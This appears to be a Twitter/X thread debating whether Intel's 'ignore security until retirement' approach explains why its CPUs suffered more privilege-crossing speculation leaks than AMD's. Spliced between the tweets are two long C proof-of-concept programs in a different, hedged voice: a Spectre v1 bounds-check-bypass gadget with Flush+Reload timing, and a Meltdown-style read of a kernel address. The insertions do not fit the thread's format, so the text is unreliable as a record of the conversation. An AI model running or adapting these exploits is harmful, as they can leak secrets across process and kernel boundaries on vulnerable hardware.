Is nobody attacking AMD, or is there some difference in design philosophy that has spared them from this wave of chip attacks?
Replying to @geofurb @damageboy
This isn't a chip attack, it's a stupid design bug. That said, there *is* a difference in design philosophy. Intel has chosen performance over any kind of design sanity/safety every time, seemingly as a systematic rule. AMD hasn't.
So while both AMD and Intel have been equally hit by the general class of speculation-based leaks in userland code (nothing the CPU can do about that), Intel has also had a huge pile of massively privilege-crossing speculation leaks that AMD hasn't.
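(For the userland case both vendors share, the canonical shape is the Spectre v1 bounds-check-bypass gadget. Below is a minimal C sketch of that pattern, illustrative only: the training counts, probe stride, and timing method are assumptions, it is x86-specific, and current CPUs, compilers, and mitigations may keep it from leaking anything.)

```c
/* Spectre v1 (bounds check bypass) sketch, x86-only. Illustrative:
 * real PoCs need per-CPU tuning and many trials; this may leak
 * nothing on a given machine. */
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <x86intrin.h>          /* _mm_clflush, _mm_mfence, __rdtscp */

#define STRIDE 512              /* one probe slot per byte value */
uint8_t array1[16];
volatile size_t array1_size = 16;
uint8_t probe[256 * STRIDE];
const char SECRET[] = "hush";   /* stands in for data beyond the bounds check */

void victim(size_t x) {
    if (x < array1_size) {      /* architecturally enforced bound... */
        /* ...but a mistrained branch predictor can run this body
         * speculatively for an out-of-range x, leaving a cache
         * footprint indexed by the out-of-bounds byte. */
        volatile uint8_t v = probe[array1[x] * STRIDE];
        (void)v;
    }
}

int main(void) {
    /* UB-but-conventional pointer arithmetic so array1[x] lands on SECRET. */
    size_t evil = (size_t)(SECRET - (const char *)array1);

    for (int t = 0; t < 100; t++) {
        for (size_t j = 0; j < 8; j++) victim(j % 16);  /* train: branch taken */
        for (int i = 0; i < 256; i++) _mm_clflush(&probe[i * STRIDE]);
        _mm_clflush((const void *)&array1_size);        /* delay the bounds check */
        _mm_mfence();
        victim(evil);                                   /* transient OOB read */
    }

    /* Flush+Reload: the slot matching the leaked byte reloads fastest.
     * Visit slots in a scrambled order to sidestep the prefetcher. */
    int best = 0; uint64_t best_t = UINT64_MAX; unsigned aux;
    for (int i = 0; i < 256; i++) {
        int s = (i * 167 + 13) & 255;
        uint64_t t0 = __rdtscp(&aux);
        volatile uint8_t v = probe[s * STRIDE]; (void)v;
        uint64_t dt = __rdtscp(&aux) - t0;
        if (dt < best_t) { best_t = dt; best = s; }
    }
    printf("guessed first byte of SECRET: 0x%02x\n", best);
    return 0;
}
```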
Because the Intel philosophy seems to have been "ignore security/sanity until the instruction retires", so all kinds of batshit insane stuff happens in speculation on Intel CPUs (like bypassing guest VM page tables or loading bad or privileged data) which doesn't on AMD.
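(The privilege-crossing case described here is the Meltdown pattern: a userland load of a kernel address faults at retirement, but on affected Intel CPUs the value is transiently forwarded to dependent loads first, while AMD blocks the data during speculation. A hedged C sketch of the shape follows; the target address and all names are hypothetical, and this recovers nothing on AMD, on patched Intel parts, or on kernels with KPTI.)

```c
/* Meltdown-pattern sketch, x86 Linux only. Illustrative, not an
 * exploit: one attempt per byte, no retries, hypothetical address. */
#include <setjmp.h>
#include <signal.h>
#include <stdint.h>
#include <stdio.h>
#include <x86intrin.h>          /* _mm_clflush, __rdtscp */

#define STRIDE 4096             /* one page per byte value, defeats prefetch */
static uint8_t probe[256 * STRIDE];
static volatile uint8_t sink;   /* forces the probe loads to be emitted */
static sigjmp_buf retry;

static void on_segv(int sig) { (void)sig; siglongjmp(retry, 1); }

static int leak_byte(const volatile uint8_t *kernel_addr) {
    for (int i = 0; i < 256; i++) _mm_clflush(&probe[i * STRIDE]);
    if (!sigsetjmp(retry, 1)) {
        /* This load faults at retirement (user access to kernel memory),
         * but on affected Intel CPUs the value is transiently forwarded
         * to the dependent probe load first, warming one cache line. */
        uint8_t v = *kernel_addr;
        sink = probe[v * STRIDE];
    }
    /* Flush+Reload in a scrambled order: the warm slot is the byte. */
    int best = 0; uint64_t best_t = UINT64_MAX; unsigned aux;
    for (int i = 0; i < 256; i++) {
        int s = (i * 167 + 13) & 255;
        uint64_t t0 = __rdtscp(&aux);
        sink = probe[s * STRIDE];
        uint64_t dt = __rdtscp(&aux) - t0;
        if (dt < best_t) { best_t = dt; best = s; }
    }
    return best;   /* pure noise on CPUs/kernels that block the leak */
}

int main(void) {
    signal(SIGSEGV, on_segv);
    /* Hypothetical kernel virtual address, purely for illustration. */
    const volatile uint8_t *target =
        (const volatile uint8_t *)0xffff888000000000ULL;
    printf("guessed byte: 0x%02x\n", leak_byte(target));
    return 0;
}
```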
This “ignore security/sanity” sentiment that Intel “has” is completely false; Intel internally has never had that philosophy. That’s something cooked up by Reddit trolls.
The evidence is damning. All those speculation bugs Intel had due to cross-privilege leakage prior to retirement make it clear. It's not once or twice, it's a pattern.
Replying to @marcan42 @SteakandChickn
By the way, I said "ignore security/sanity *until the instruction retires*". They cared about the security of the end result, they just didn't care about security along the way, and as anyone well versed in security knows, that's a recipe for disaster. Defense in depth.
So are you suggesting it was outright malicious intent or laziness? Or both?
Replying to @SteakandChickn @marcan42
Also, unless you’ve had engineers themselves tell you this, I wouldn’t say it’s “defense in depth”.
Neither. I bet it was a shitty policy, probably cooked up by managers, that no transistor shall be "wasted" on things that "don't matter" because the instruction will fault/roll back anyway, since extra checks would just reduce performance for "no reason".
And they probably had a few people further down who saw the problems with this approach, and whose concerns were either ignored or stifled from the start due to corporate culture.
Replying to @marcan42 @SteakandChickn
"defense in depth" is a common term in security, and it's what Intel didn't do (and should've). You don't build a brittle system that will crash at the first mistake, you add redundant security in case something goes wrong.